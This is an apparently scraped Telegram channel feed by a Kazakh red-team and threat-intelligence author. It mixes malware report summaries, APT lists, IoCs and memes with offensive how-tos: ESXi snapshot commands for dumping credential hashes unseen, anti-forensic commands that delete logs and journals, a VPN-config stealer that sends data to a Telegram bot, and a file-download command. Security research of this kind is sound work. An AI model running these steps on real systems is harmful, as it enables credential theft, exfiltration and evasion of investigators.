s0ld13r ch.
05.05.202512:29
WMIHACKER 2.0 CAME BACK 👾
WMIHACKER 2.0 — бэкдор построенный как модульный C2 через WMI/DCOM. В исследовании будем разбирать его архитектуру, примеры применения в Red Team/Adversary Emulation операциях и детекты 🛡
Фичей инструмента является использование ресурсов атакуемой инфраструктуры, как С2. Т.е вооружение уже скомпрометированных хостов на этапе закрепления 🇵🇰
В посте я еще разобрал отличие симметричной и ассиметричной С2 инфраструктуры, описал принцип работы бэкдора через кастомные ICMP ECHO запросы и коммуникацию с С2. Приятного чтения! 😘
Вдохновение подчерпнул из поста @ThreatHuntingFather про цепочку атаки АРТ группировки EARTH KURMA 🦔
🔗 Link: https://www.s0ld13r.kz/posts/wmihacker-2.0/
5️⃣ Repo: https://github.com/s0ld13rr/WMIHACKER
P.S Сделано для Red Team и ресерча. Не для зла — для понимания 🙏
#RedTeam #APT #Research
🧢 s0ld13r
WMIHACKER 2.0 — бэкдор построенный как модульный C2 через WMI/DCOM. В исследовании будем разбирать его архитектуру, примеры применения в Red Team/Adversary Emulation операциях и детекты 🛡
Фичей инструмента является использование ресурсов атакуемой инфраструктуры, как С2. Т.е вооружение уже скомпрометированных хостов на этапе закрепления 🇵🇰
В посте я еще разобрал отличие симметричной и ассиметричной С2 инфраструктуры, описал принцип работы бэкдора через кастомные ICMP ECHO запросы и коммуникацию с С2. Приятного чтения! 😘
Вдохновение подчерпнул из поста @ThreatHuntingFather про цепочку атаки АРТ группировки EARTH KURMA 🦔
🔗 Link: https://www.s0ld13r.kz/posts/wmihacker-2.0/
5️⃣ Repo: https://github.com/s0ld13rr/WMIHACKER
P.S Сделано для Red Team и ресерча. Не для зла — для понимания 🙏
#RedTeam #APT #Research
🧢 s0ld13r
28.04.202511:04
The Only Easy Day... Was Yesterday 💀
Собрал подборку исторических публикаций с кейсами где упоминали Казахстан в АРТ/Cybercrime отчетах с разбивкой по годам, приятного чтения 🐸
2019 😱
• APT28: Targeted attacks against mining corporations in Kazakhstan
• Extensive hacking operation discovered in Kazakhstan
2020 - 2022 🧟♂️
• Study of the APT attacks on state institutions in Kazakhstan and Kyrgyzstan
• Two Carbanak hackers sentenced to eight years in prison in Kazakhstan
• Watering hole threat analysis in the public sector of Kazakhstan
• A multi-stage PowerShell based attack targets Kazakhstan
• Lookout Uncovers Android Spyware Deployed in Kazakhstan
• Spyware vendor targets users in Italy and Kazakhstan
2023 - 2024 🐾
• Espionage activity of UAC-0063 against Ukraine, Kazakhstan, Kyrgyzstan, Mongolia, Israel, India
• Bloody Wolf strikes organizations in Kazakhstan with STRRAT commercial malware
2025 😎
• Double-Tap Campaign: Russia-nexus APT possibly related to APT28 conducts cyber espionage on Central Asia and Kazakhstan diplomatic relations
Если есть еще что-то, feel free скинуть ссылочку в комменты 🕺
🧢 s0ld13r
Собрал подборку исторических публикаций с кейсами где упоминали Казахстан в АРТ/Cybercrime отчетах с разбивкой по годам, приятного чтения 🐸
2019 😱
• APT28: Targeted attacks against mining corporations in Kazakhstan
• Extensive hacking operation discovered in Kazakhstan
2020 - 2022 🧟♂️
• Study of the APT attacks on state institutions in Kazakhstan and Kyrgyzstan
• Two Carbanak hackers sentenced to eight years in prison in Kazakhstan
• Watering hole threat analysis in the public sector of Kazakhstan
• A multi-stage PowerShell based attack targets Kazakhstan
• Lookout Uncovers Android Spyware Deployed in Kazakhstan
• Spyware vendor targets users in Italy and Kazakhstan
2023 - 2024 🐾
• Espionage activity of UAC-0063 against Ukraine, Kazakhstan, Kyrgyzstan, Mongolia, Israel, India
• Bloody Wolf strikes organizations in Kazakhstan with STRRAT commercial malware
2025 😎
• Double-Tap Campaign: Russia-nexus APT possibly related to APT28 conducts cyber espionage on Central Asia and Kazakhstan diplomatic relations
Если есть еще что-то, feel free скинуть ссылочку в комменты 🕺
🧢 s0ld13r
17.04.202506:17
Новый день, новый RAT 🔫
ResolverRAT - относительно новый троян удаленного доступа написанный на .NET и использовавшийся в атаках на медицинские учреждения 👨🏻⚕️
🔍 Что интересного?
• Параллельно проверяет сразу несколько способов закрепа в файловой системе (AppData/Program Files)
• Certificate pining - в агенты "вшит" механизм пининга TLS сертификатов, для улучшенного OPSEC и сокрытия в сетевом трафике
• Кастомный протокол для коммуникации с С2
🔗 Research: https://www.morphisec.com/blog/new-malware-variant-identified-resolverrat-enters-the-maze/
P.S IoC оставил в коммах и залил на threatintel.kz 😉
🧢 s0ld13r
ResolverRAT - относительно новый троян удаленного доступа написанный на .NET и использовавшийся в атаках на медицинские учреждения 👨🏻⚕️
🔍 Что интересного?
• Параллельно проверяет сразу несколько способов закрепа в файловой системе (AppData/Program Files)
• Certificate pining - в агенты "вшит" механизм пининга TLS сертификатов, для улучшенного OPSEC и сокрытия в сетевом трафике
• Кастомный протокол для коммуникации с С2
🔗 Research: https://www.morphisec.com/blog/new-malware-variant-identified-resolverrat-enters-the-maze/
P.S IoC оставил в коммах и залил на threatintel.kz 😉
🧢 s0ld13r
01.04.202511:36
Volatility + ESXi = Бесшумный дамп хэшей и NTDS 😈
Когда дело касается извлечения учетных данных, большинство атак сосредоточено на виндовых машинах – Mimikatz, DCSync, Pass-the-Hash. Но что, если спуститься ниже? Если ты контролируешь гипервизор, тебе даже не нужно ломать саму ОС – ты просто забираешь память ВМ целиком и извлекаешь из нее хэши, NTDS и другие артефакты без триггеров EDR/SIEM 🐸
Ниже описал прикольный вектор через Volatility и консоль VMware для бесшумного дампа кредов с серверов 🪨
Поиск информации о виртуальных машинах на сервере ❗️
Создаем snapshot системы с обязательным извлечением
В
А самый угар в том что на уровне ОС самой виртуалки и никакими антивирусами это не выловить, поможет только мониторинг активности и грамотная настройка Access List-ов 😏
P.S Автор против блэчеров и активно выступает за согласованние действий с владельцами систем
🧢 s0ld13r
Когда дело касается извлечения учетных данных, большинство атак сосредоточено на виндовых машинах – Mimikatz, DCSync, Pass-the-Hash. Но что, если спуститься ниже? Если ты контролируешь гипервизор, тебе даже не нужно ломать саму ОС – ты просто забираешь память ВМ целиком и извлекаешь из нее хэши, NTDS и другие артефакты без триггеров EDR/SIEM 🐸
Ниже описал прикольный вектор через Volatility и консоль VMware для бесшумного дампа кредов с серверов 🪨
Поиск информации о виртуальных машинах на сервере ❗️
vim-cmd vmsvc/getallvmsСоздаем snapshot системы с обязательным извлечением
*.vmem файла 🔫vim-cmd vmsvc/snapshot.create <vmid> <snapshotname> <description> true trueВ
/vmfs/volumes/<uuid>/<snapshotname> будет файл с расширением *.vmem который можно будет проанализировать при помощи Volatility 😆/tmp/v -f "/vmfs/volumes/<uuid>/<snapshotname>/file.vmem" imageinfoА самый угар в том что на уровне ОС самой виртуалки и никакими антивирусами это не выловить, поможет только мониторинг активности и грамотная настройка Access List-ов 😏
P.S Автор против блэчеров и активно выступает за согласованние действий с владельцами систем
🧢 s0ld13r
Reposted from:
Threat Hunting Father
23.03.202517:39
Казахстан в числе жертв APT атак?😱
Доклад о Incident Response и этапах с которыми столкнулась команда KZ-CERT при реагировании на APT угрозы.
🔗https://youtu.be/OP29qgArQNU
🦔THF
Доклад о Incident Response и этапах с которыми столкнулась команда KZ-CERT при реагировании на APT угрозы.
This year's i-Soon leak revealed that Critical Infrastructures were targeted by Chinese APT in different countries such as: US, India, Kazakhstan, Vietnam, Malaysia, Mongolia, Taiwan, Thailand, South Korea, the Philippines, Myanmar, and Nepal.
We are Kazakhstan’s National Computer Emergency Response team were responsible for coordinating in handling these incidents and clearing the infrastructure.
As a result, we come up with Infrastructure cleanup plan from APT. In this talk we would like to go through all stages of responding to the incident starting from building a team, setting up a secure communication channel and describing tools used in each stage of response.
We will also focus on using Kaspersky Anti Targeted Attack Platform EDR and Sandbox.
At the end we will reveal several unusual TTP’s of an actor.
🔗https://youtu.be/OP29qgArQNU
🦔THF
18.03.202517:11
Новая угроза атакует 💀
Исследователи Microsoft обнаружили новый троян удаленного доступа – StilachiRAT, который демонстрирует интересные техники уклонения от детекта, кражу данных и устойчивость в системе 🕺
Основные возможности StilachiRAT:
🔍 Сбор системной информации – собирает сведения об ОС, аппаратной конфигурации, RDP-сессиях и активных приложениях.
🔑 Кража учетных данных – извлекает сохраненные пароли из браузера Google Chrome.
💰 Охота на криптокошельки – ищет настройки 20+ расширений криптокошельков в реестре Windows.
📡 C2-коммуникация – использует порты 53, 443, 16000 для связи с сервером управления, выполняет удаленные команды и может работать как прокси.
🔄 Персистентность – использует Windows SCM и механизмы самовосстановления.
🕵️♂️ Мониторинг RDP – отслеживает активные RDP-сессии, перехватывает окна и может имитировать действия пользователя.
✂ Слежка за буфером обмена – ищет пароли и криптоключи в скопированных данных.
🚫 Анти-форензика – чистит журналы событий и обнаруживает песочницы.
Пока Microsoft не связывает StilachiRAT с конкретной группировкой, но предупреждает о его скрытности и рисках. Защититься можно с помощью строгих политик безопасности, ограничения прав пользователей и мониторинга подозрительной активности в сети
🔗 Подробнее можно почитать тут: https://www.microsoft.com/en-us/security/blog/2025/03/17/stilachirat-analysis-from-system-reconnaissance-to-cryptocurrency-theft/
P.S IoC с C2 в коммах 🌟
@s0ld13r_ch
Исследователи Microsoft обнаружили новый троян удаленного доступа – StilachiRAT, который демонстрирует интересные техники уклонения от детекта, кражу данных и устойчивость в системе 🕺
Основные возможности StilachiRAT:
🔍 Сбор системной информации – собирает сведения об ОС, аппаратной конфигурации, RDP-сессиях и активных приложениях.
🔑 Кража учетных данных – извлекает сохраненные пароли из браузера Google Chrome.
💰 Охота на криптокошельки – ищет настройки 20+ расширений криптокошельков в реестре Windows.
📡 C2-коммуникация – использует порты 53, 443, 16000 для связи с сервером управления, выполняет удаленные команды и может работать как прокси.
🔄 Персистентность – использует Windows SCM и механизмы самовосстановления.
🕵️♂️ Мониторинг RDP – отслеживает активные RDP-сессии, перехватывает окна и может имитировать действия пользователя.
✂ Слежка за буфером обмена – ищет пароли и криптоключи в скопированных данных.
🚫 Анти-форензика – чистит журналы событий и обнаруживает песочницы.
Пока Microsoft не связывает StilachiRAT с конкретной группировкой, но предупреждает о его скрытности и рисках. Защититься можно с помощью строгих политик безопасности, ограничения прав пользователей и мониторинга подозрительной активности в сети
🔗 Подробнее можно почитать тут: https://www.microsoft.com/en-us/security/blog/2025/03/17/stilachirat-analysis-from-system-reconnaissance-to-cryptocurrency-theft/
P.S IoC с C2 в коммах 🌟
@s0ld13r_ch
04.05.202513:41
S0LD13R - WMI Hacker 2.0 (WIP)
Работаю над одним исследованием, связанным с WMI бэкдором. Статья будет опубликована в моем блоге - s0ld13r.kz, следите за новостями 😘
🧢 s0ld13r
Работаю над одним исследованием, связанным с WMI бэкдором. Статья будет опубликована в моем блоге - s0ld13r.kz, следите за новостями 😘
🧢 s0ld13r
Reposted from:
Adaptix Framework
28.04.202506:50
AdaptixC2 v0.4 is out
https://github.com/Adaptix-Framework/AdaptixC2
* New Linux/MacOS "gopher" agent
* TCP/mTLS external listener for "gopher" agent
* New internal TCP listener for "beacon" agent
* Monitoring of "working time" and "exitdate" agent parameters
* Screenshot storage
More details in the changelog: https://adaptix-framework.gitbook.io/adaptix-framework/changelog/v0.3-greater-than-v0.4
https://github.com/Adaptix-Framework/AdaptixC2
* New Linux/MacOS "gopher" agent
* TCP/mTLS external listener for "gopher" agent
* New internal TCP listener for "beacon" agent
* Monitoring of "working time" and "exitdate" agent parameters
* Screenshot storage
More details in the changelog: https://adaptix-framework.gitbook.io/adaptix-framework/changelog/v0.3-greater-than-v0.4
Reposted from:
Know Your Adversary
09.04.202518:53
Всем привет!
Думаю, вы уже слышали об уязвимости нулевого дня в Common Log File System (CLFS), которая эксплуатировалась RansomEXX. Речь идет о CVE-2025-29824.
Если заглянуть в отчет Microsoft Threat Intelligence Center (MSTIC), можно заметить любопытный артефакт. В рамках эксплуатации создается CLFS BLF-файл:
Что это значит? Мы можем использовать это поведение для проактивного поиска подобной активности! Например:
Несмотря на то, что злоумышленник использовал уязвимость нулевого дня для повышения привилегий, в цепочке атаки были и легко обнаруживаемые действия — например, злоупотребление ProcDump для дампа LSASS.
Как всегда — даже в сложных случаях у нас есть масса возможностей для детектирования!
Увидимся завтра!
English version
Думаю, вы уже слышали об уязвимости нулевого дня в Common Log File System (CLFS), которая эксплуатировалась RansomEXX. Речь идет о CVE-2025-29824.
Если заглянуть в отчет Microsoft Threat Intelligence Center (MSTIC), можно заметить любопытный артефакт. В рамках эксплуатации создается CLFS BLF-файл:
C:\ProgramData\SkyPDF\PDUDrv.blf.Что это значит? Мы можем использовать это поведение для проактивного поиска подобной активности! Например:
event_type: "filecreatewin"
AND
file_path: ("programdata" AND "blf")
Несмотря на то, что злоумышленник использовал уязвимость нулевого дня для повышения привилегий, в цепочке атаки были и легко обнаруживаемые действия — например, злоупотребление ProcDump для дампа LSASS.
Как всегда — даже в сложных случаях у нас есть масса возможностей для детектирования!
Увидимся завтра!
English version
31.03.202507:15
Ultimate Malware Collection 👋
В github пользователь с ником Cryakl выложил огромный пак с билдерами RAT (Remote Access Trojan) и Ransomware для исследования 🦇
Репозитории огромные и наполнены кучей интересной малвари, на скрине к примеру можно увидеть известный XWorm - излюбленный инструмент threat акторов из Китая 🇨🇳
🧟♂️ RAT: https://github.com/Cryakl/Ultimate-RAT-Collection
🧟♂️ Ransomware: https://github.com/Cryakl/Ransomware-Database
🧢 s0ld13r
В github пользователь с ником Cryakl выложил огромный пак с билдерами RAT (Remote Access Trojan) и Ransomware для исследования 🦇
Репозитории огромные и наполнены кучей интересной малвари, на скрине к примеру можно увидеть известный XWorm - излюбленный инструмент threat акторов из Китая 🇨🇳
🧟♂️ RAT: https://github.com/Cryakl/Ultimate-RAT-Collection
🧟♂️ Ransomware: https://github.com/Cryakl/Ransomware-Database
🧢 s0ld13r
22.03.202516:03
LOL... да кто это ваш LOLRMM?! 😠
Последние тенденции крутятся вокруг легитимного или условно легитимного софта, именуемых как LOL (Living of the Land). Данную технику часто применяют Threat Actor'ы, чтобы немного поиграть на нервишках SOC и оставаться в сети максимально долго 🥷
Я уже обозревал некоторые проекты по типу LOLC2, а комьюнити уже выкатило огромный список RMM инструментов (по типу AnyDesk/TeamViewer):
Из интересного для TH 🛡
Собрали 272 индикаторов инструментов для удаленного администрирования, что позволит обогатить данные в правилах и с большей долей вероятности поймать плохиша ❗️
Из интересного для Red Team 🎩
Список инструментов которые можно использовать и тихо сидеть в сетке не вызывая шума под носом у Антивируса 😏
🔗 Link: https://lolrmm.io/
@s0ld13r_ch
Последние тенденции крутятся вокруг легитимного или условно легитимного софта, именуемых как LOL (Living of the Land). Данную технику часто применяют Threat Actor'ы, чтобы немного поиграть на нервишках SOC и оставаться в сети максимально долго 🥷
Я уже обозревал некоторые проекты по типу LOLC2, а комьюнити уже выкатило огромный список RMM инструментов (по типу AnyDesk/TeamViewer):
LOLRMMis a curated list of Remote Monitoring and Management (RMM) tools that could potentially be abused by threat actors. Inspired by the original LOLBAS project for tracking binaries and closely associated with LOLDrivers for malicious drivers, this project aims to assist security professionals in staying informed about these tools and their potential for misuse.
Из интересного для TH 🛡
Собрали 272 индикаторов инструментов для удаленного администрирования, что позволит обогатить данные в правилах и с большей долей вероятности поймать плохиша ❗️
Из интересного для Red Team 🎩
Список инструментов которые можно использовать и тихо сидеть в сетке не вызывая шума под носом у Антивируса 😏
🔗 Link: https://lolrmm.io/
@s0ld13r_ch
Reposted from:![ByTe [ ]f Digital Life avatar](/_next/image?url=https%3A%2F%2Fstatic-storm.tglist.com%2Fda1b354b28a3cd215fbc5731e8fd06cb%2Fea23f4f4-087d-4d8a-a17c-2be82838e12d.jpg%3Fw%3D24%26h%3D24&w=48&q=75)
ByTe [ ]f Digital Life
17.03.202507:39
ANTI-FORENSIC WIN 💋
Рассмотрим несколько интересных методов антикриминалистики в WINDOWS
1. Очистка DNS кеша
2. Отключение NTFS Last Access Time
NtfsDisableLastAccessUpdate = 1: при значении 1 в реестре Windows перестаёт обновлять поле «Дата последнего доступа» к файлам и папкам, когда к ним просто обращаются для чтения (не изменяя при этом содержимое).
fsutil behavior set disablelastaccess 3: дополнительная команда, которая на уровне системы (через утилиту fsutil) указывает Windows не обновлять метку времени последнего доступа.
3. Отключение Prefetch и Superfetch
Prefetch - один из значимых артефактов ОС Windows который позволяет фиксировать запуск ПО на хосте.
Эти параметры в реестре отвечают за технологии Prefetch и Superfetch.
EnablePrefetcher = 0: при 0 Windows не будет создавать файлы-префетч для приложений (включая системные).
EnableSuperfetch = 0: Superfetch также отключается.
4. Остановка службы Windows Timeline (CDPUserSvc)
CDPUserSvc (Connected Devices Platform) — сервис, который, в частности, отвечает за сбор данных для «Журнала действий», «Таймлайна» и некоторые функции синхронизации с облачными сервисами.
5. Удаление журнала USN (NTFS Change Journal)
Команда fsutil usn deletejournal /d c: удаляет «журнал изменений» (USN Journal) на разделе C:.
Журнал USN (Update Sequence Number Journal) отслеживает все изменения на том или ином томе с файловой системой NTFS — созданы ли файлы, отредактированы, перенесены и т.д.
Рассмотрим несколько интересных методов антикриминалистики в WINDOWS
1. Очистка DNS кеша
ipconfig /flushdns >$null2. Отключение NTFS Last Access Time
Set-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\FileSystem' -Name 'NtfsDisableLastAccessUpdate' -Value 1 -ForceNtfsDisableLastAccessUpdate = 1: при значении 1 в реестре Windows перестаёт обновлять поле «Дата последнего доступа» к файлам и папкам, когда к ним просто обращаются для чтения (не изменяя при этом содержимое).
fsutil behavior set disablelastaccess 3: дополнительная команда, которая на уровне системы (через утилиту fsutil) указывает Windows не обновлять метку времени последнего доступа.
3. Отключение Prefetch и Superfetch
Prefetch - один из значимых артефактов ОС Windows который позволяет фиксировать запуск ПО на хосте.
Set-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\' -Name 'EnablePrefetcher' -Value 0 -ForceЭти параметры в реестре отвечают за технологии Prefetch и Superfetch.
EnablePrefetcher = 0: при 0 Windows не будет создавать файлы-префетч для приложений (включая системные).
EnableSuperfetch = 0: Superfetch также отключается.
4. Остановка службы Windows Timeline (CDPUserSvc)
Stop-Service -Name CDPUserSvc* -Force 2>$nullCDPUserSvc (Connected Devices Platform) — сервис, который, в частности, отвечает за сбор данных для «Журнала действий», «Таймлайна» и некоторые функции синхронизации с облачными сервисами.
5. Удаление журнала USN (NTFS Change Journal)
fsutil usn deletejournal /d c: 2>$nullКоманда fsutil usn deletejournal /d c: удаляет «журнал изменений» (USN Journal) на разделе C:.
Журнал USN (Update Sequence Number Journal) отслеживает все изменения на том или ином томе с файловой системой NTFS — созданы ли файлы, отредактированы, перенесены и т.д.
Reposted from:
FR13NDS TEAM | Channel
29.04.202502:44
Итоги Международных игр по кибербезопасности 🤟
🌏 24–25 апреля состоялся финал Международных игр по кибербезопасности весеннего сезона.
🏆 Наша команда FR13NDS TEAM 😏 заняла 2-е место, набрав одинаковое количество очков с командой LiL Cringē в роли атакующих.
🏅 Также поздравляем команду защитников Digital Qalqan Team из Казахстана 🇰🇿 с успешным выступлением — 5 место, заработав равное количество очков как топ 1-5.
🖥 Международные игры по кибербезопасности проходят в формате кибербитвы на крупном киберполигоне Standoff от Positive Technologies. Сайт международных игр - https://cybersecuritygames.org.
ℹ️ Больше информации — в посте организаторов:
https://t.me/standoff_365/787
🌏 24–25 апреля состоялся финал Международных игр по кибербезопасности весеннего сезона.
🏆 Наша команда FR13NDS TEAM 😏 заняла 2-е место, набрав одинаковое количество очков с командой LiL Cringē в роли атакующих.
🏅 Также поздравляем команду защитников Digital Qalqan Team из Казахстана 🇰🇿 с успешным выступлением — 5 место, заработав равное количество очков как топ 1-5.
🖥 Международные игры по кибербезопасности проходят в формате кибербитвы на крупном киберполигоне Standoff от Positive Technologies. Сайт международных игр - https://cybersecuritygames.org.
ℹ️ Больше информации — в посте организаторов:
https://t.me/standoff_365/787
08.04.202516:25
Выгоревший сотрудник SOC когда его попросили заняться еще одним "интересным кейсом" 🤬
#meme
🧢 s0ld13r
#meme
🧢 s0ld13r
28.03.202511:08
Когда зашёл в сеть компании и нашёл в открытом доступе файлик Пароли.xlsx 😎
#meme
@s0ld13r_ch
#meme
@s0ld13r_ch
21.03.202510:13
Нас уже 500 🎉
И в честь этого разыгрываю три premium аккаунта в Телеграм ✈️
Условия:
Быть подписанным на канал @s0ld13r_ch и на каналы коллег ❤️
@ThreatHuntingFather - Батя Threat Hunting'а 😄
@network_quiz - кайфовый канал с разборами тем по сетям 🔫
@byteoflife - канал с отловом IoC блэчеров и интересными находками 🦅
Результаты выйдут 23го марта, stay tuned 🕺
Ну и нажать кнопочку участвовать 👋
@s0ld13r_ch
И в честь этого разыгрываю три premium аккаунта в Телеграм ✈️
Условия:
Быть подписанным на канал @s0ld13r_ch и на каналы коллег ❤️
@ThreatHuntingFather - Батя Threat Hunting'а 😄
@network_quiz - кайфовый канал с разборами тем по сетям 🔫
@byteoflife - канал с отловом IoC блэчеров и интересными находками 🦅
Результаты выйдут 23го марта, stay tuned 🕺
Ну и нажать кнопочку участвовать 👋
@s0ld13r_ch
13.03.202510:09
Подхватил у @byteoflife идею этого поста и хочу поделиться про довольно популярную технику фингерпринтинга - Favicon Hashing 😸
Цель данной техники заключается в идентификации веб страниц и приложений на основе их значка favicon, в случае если актор использует весьма заметный favicon или не поменял его при деплое C2, то можно попробовать найти его в различных поисковых системах по типу Censys, FOFA 🦅
Для снятия хэша favicon можно использовать данный ресурс: https://faviconhasher.codejavu.tech/
А касательно поста вот и сам favicon hash (FOFA) 😏
FOFA выдал 20 результатов, с 4 уникальными значениями 🔫
Детектнутые домены и IP 🪨
144[.]91[.]79[.]54
144[.]91[.]92[.]251
partagerapide[.]com
horusprotector[.]help
@s0ld13r_ch
Цель данной техники заключается в идентификации веб страниц и приложений на основе их значка favicon, в случае если актор использует весьма заметный favicon или не поменял его при деплое C2, то можно попробовать найти его в различных поисковых системах по типу Censys, FOFA 🦅
Для снятия хэша favicon можно использовать данный ресурс: https://faviconhasher.codejavu.tech/
А касательно поста вот и сам favicon hash (FOFA) 😏
icon_hash="-1049861794"FOFA выдал 20 результатов, с 4 уникальными значениями 🔫
Детектнутые домены и IP 🪨
144[.]91[.]79[.]54
144[.]91[.]92[.]251
partagerapide[.]com
horusprotector[.]help
@s0ld13r_ch
28.04.202516:20
23.04.202505:18
MITRE ATT&CK v17 уже тут! Что нового? 👋
Свежий релиз MITRE ATT&CK v17 (апрель 2025) — это масштабное обновление базы знаний о тактиках и техниках атак 🛡
Вот кратко по ключевым изменениям:
Добавлена платформа VMWare ESXi ❤️ — теперь действия злоумышленников на VMware ESXi (гипервизор) имеют собственную матрицу:
🔗 https://attack.mitre.org/matrices/enterprise/esxi/
Переименована платформа Network в Network Devices — для более точного отражения охвата (сетевые устройства).
Улучшены описания Enterprise Mitigations — теперь они стали куда понятнее и полезнее 😎
🔗 https://attack.mitre.org/mitigations/enterprise/
Удалена техника DLL Side-Loading (T1574.002), она была объеденена с DLL Search Order Hijacking (T1574.001), которая теперь просто называется Hijack Execution Flow: DLL 🔍
Ссылки:
🔗 https://attack.mitre.org/resources/updates/
🔗 https://medium.com/mitre-attack/attack-v17-dfb59eae2204
🧢 s0ld13r
Свежий релиз MITRE ATT&CK v17 (апрель 2025) — это масштабное обновление базы знаний о тактиках и техниках атак 🛡
Вот кратко по ключевым изменениям:
Добавлена платформа VMWare ESXi ❤️ — теперь действия злоумышленников на VMware ESXi (гипервизор) имеют собственную матрицу:
🔗 https://attack.mitre.org/matrices/enterprise/esxi/
Переименована платформа Network в Network Devices — для более точного отражения охвата (сетевые устройства).
Улучшены описания Enterprise Mitigations — теперь они стали куда понятнее и полезнее 😎
🔗 https://attack.mitre.org/mitigations/enterprise/
Удалена техника DLL Side-Loading (T1574.002), она была объеденена с DLL Search Order Hijacking (T1574.001), которая теперь просто называется Hijack Execution Flow: DLL 🔍
Ссылки:
🔗 https://attack.mitre.org/resources/updates/
🔗 https://medium.com/mitre-attack/attack-v17-dfb59eae2204
🧢 s0ld13r
06.04.202512:47
Threat Intelligence drop ragghhhh 🕺🕺
Рефлексируя тематику этого канала, решил запустить небольшой комьюнити проект для шейра индикаторов компрометации и угроз которые таргетят Центральную Азию (и не только) 💃
Думаю это логичное продолжение тематики TI на канале, чтобы где то можно было собрать все находки и передавать их комьюнити ❤️
В скором времени начну активно добавлять IoC с различных исследований, фидов и залью индикаторы которые смог найти в предыдущих постах 😎
Буду рад вкладу каждого в развитие TI платформы (на базе MISP) — можно присылать свои находки, ссылки на репорты, дампы, фиды и просто идеи. Даже маленький IoC может оказаться критически важным для других, все абсолютно бесплатно и на безвозмездной основе, если будет желание подключиться и помочь то мой лс всегда открыт 😸
Рад представить вам threatintel.kz 👋
🧢 s0ld13r
Рефлексируя тематику этого канала, решил запустить небольшой комьюнити проект для шейра индикаторов компрометации и угроз которые таргетят Центральную Азию (и не только) 💃
Думаю это логичное продолжение тематики TI на канале, чтобы где то можно было собрать все находки и передавать их комьюнити ❤️
В скором времени начну активно добавлять IoC с различных исследований, фидов и залью индикаторы которые смог найти в предыдущих постах 😎
Буду рад вкладу каждого в развитие TI платформы (на базе MISP) — можно присылать свои находки, ссылки на репорты, дампы, фиды и просто идеи. Даже маленький IoC может оказаться критически важным для других, все абсолютно бесплатно и на безвозмездной основе, если будет желание подключиться и помочь то мой лс всегда открыт 😸
Рад представить вам threatintel.kz 👋
🧢 s0ld13r
28.03.202507:09
Кто любит VPN?! 😆
Последние дни я размышлял об аналитике в Red Team. В ходе операций важно проводить качественную энумерацию — даже мелкие находки могут усилить атаку. Так я задумался о корпоративных VPN 🤔
Доступ к VPN расширяет возможности для пивотинга и эскалации атаки. Я решил исследовать, как злоумышленник или Red Team могут использовать стандартные VPN-клиенты для разведки на хосте и обхода AV 🔫
Нашел пару use кейсов на примере клиента CheckPoint VPN:
В лог файле агента`C:\Program Files (x86)\CheckPoint\Endpoint Connect\trac.log` конфигурации подключения trac.config могут быть записаны в нешифрованном виде, что может дать информацию о VPN пирах, пользователе, типе подключения, есть ли 2FA и до каких подсетей может достучаться атакуемый пользователь 🤣
В качестве PoC написал инструмент для поиска конфигов на хосте 😠
Второй кейс, есть возможность загрузить любой файлик с интернета при помощи компонента VPN агента на хост. Бинарь который способен скачать файл DAAW.exe (PoC ниже)
❗️ File Drop via Check Point VPN binaries:
Техника спалится в EDR из-за шумных флагов, но все же прикольный способ учитывая что обычный AV на него не ругнется из за чистых сигнатур.
P.S Использовать только в целях изучения, автор против неправомерных действий без согласия владельцев систем
@s0ld13r_ch
Последние дни я размышлял об аналитике в Red Team. В ходе операций важно проводить качественную энумерацию — даже мелкие находки могут усилить атаку. Так я задумался о корпоративных VPN 🤔
Доступ к VPN расширяет возможности для пивотинга и эскалации атаки. Я решил исследовать, как злоумышленник или Red Team могут использовать стандартные VPN-клиенты для разведки на хосте и обхода AV 🔫
Нашел пару use кейсов на примере клиента CheckPoint VPN:
В лог файле агента`C:\Program Files (x86)\CheckPoint\Endpoint Connect\trac.log` конфигурации подключения trac.config могут быть записаны в нешифрованном виде, что может дать информацию о VPN пирах, пользователе, типе подключения, есть ли 2FA и до каких подсетей может достучаться атакуемый пользователь 🤣
В качестве PoC написал инструмент для поиска конфигов на хосте 😠
Chocopieis a tool designed for reconnaissance on a host system, specifically to check for the presence of VPN configuration files. It scans the system drive (`C:\Users\`) for OpenVPN configuration files (`.ovpn`) and extracts VPN-related configurations from CheckPoint Endpoint Connect logs. The found data is then automatically sent to a Telegram bot.
Второй кейс, есть возможность загрузить любой файлик с интернета при помощи компонента VPN агента на хост. Бинарь который способен скачать файл DAAW.exe (PoC ниже)
❗️ File Drop via Check Point VPN binaries:
C:\Program Files (x86)\CheckPoint\Endpoint Connect\DAAW.exe -url <url> -fileName <path>
Техника спалится в EDR из-за шумных флагов, но все же прикольный способ учитывая что обычный AV на него не ругнется из за чистых сигнатур.
P.S Использовать только в целях изучения, автор против неправомерных действий без согласия владельцев систем
@s0ld13r_ch
20.03.202508:37
Happy Nauryz 2025 🌺🦋🤣
May your shells be stable, your scans fruitful, and your reports impactful. Wishing you epic hunts, successful pentests, and zero false positives! 😉
@s0ld13r_ch
May your shells be stable, your scans fruitful, and your reports impactful. Wishing you epic hunts, successful pentests, and zero false positives! 😉
@s0ld13r_ch
13.03.202507:22
SNI Spoofing for Defense Evasion 🔥
SNI (Server Name Indication) — это расширение для протокола TLS, позволяющее клиенту указать имя домена, к которому он хочет подключиться, еще до установки защищенного соединения 👮♀️
SNI Spoofing — это метод обхода web фильтров, когда клиент указывает в SNI разрешённый домен (например, windowsupdate.com), а фактически подключается к другому ресурсу по IP. Если веб-сервер на стороне атакующего поддерживает произвольные SNI, он примет соединение, несмотря на подмену 😎
Данный метод бесполезен при фильтрации по IP и другим индикаторам, однако как дополнительный слой OPSEC в Red Team операциях вполне себе неплох. Мимикрируя под легитимные домены можно скрывать канал коммуникации с C2 🔫
🔗 Research: https://blog.compass-security.com/2025/03/bypassing-web-filters-part-1-sni-spoofing/
P.S Не инструкция к действию, только в целях обучения 🐈⬛
@s0ld13r_ch
SNI (Server Name Indication) — это расширение для протокола TLS, позволяющее клиенту указать имя домена, к которому он хочет подключиться, еще до установки защищенного соединения 👮♀️
SNI Spoofing — это метод обхода web фильтров, когда клиент указывает в SNI разрешённый домен (например, windowsupdate.com), а фактически подключается к другому ресурсу по IP. Если веб-сервер на стороне атакующего поддерживает произвольные SNI, он примет соединение, несмотря на подмену 😎
Данный метод бесполезен при фильтрации по IP и другим индикаторам, однако как дополнительный слой OPSEC в Red Team операциях вполне себе неплох. Мимикрируя под легитимные домены можно скрывать канал коммуникации с C2 🔫
🔗 Research: https://blog.compass-security.com/2025/03/bypassing-web-filters-part-1-sni-spoofing/
